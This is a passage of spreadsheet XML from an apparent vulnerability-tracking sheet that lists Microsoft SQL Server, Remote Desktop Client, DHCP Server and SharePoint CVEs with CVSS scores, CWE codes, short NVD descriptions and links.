      <c r="T118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67380</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67381</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K119" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67381</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67384</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K120" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67384</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67385</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K121" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t>Use after free in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67385</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67388</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K122" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S122" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67388</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67631</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K123" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67631</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67638</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K124" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S124" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67638</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67639</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K125" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S125" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67639</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67642</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K126" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S126" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67642</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67643</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K127" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S127" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67643</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68775</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K128" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S128" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68775</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68786</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K129" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S129" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68786</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68828</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr"/>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S130" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68828</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69266</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K131" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S131" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69266</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69268</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K132" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S132" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69268</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69273</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K133" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S133" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69273</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69282</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K134" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S134" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69282</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
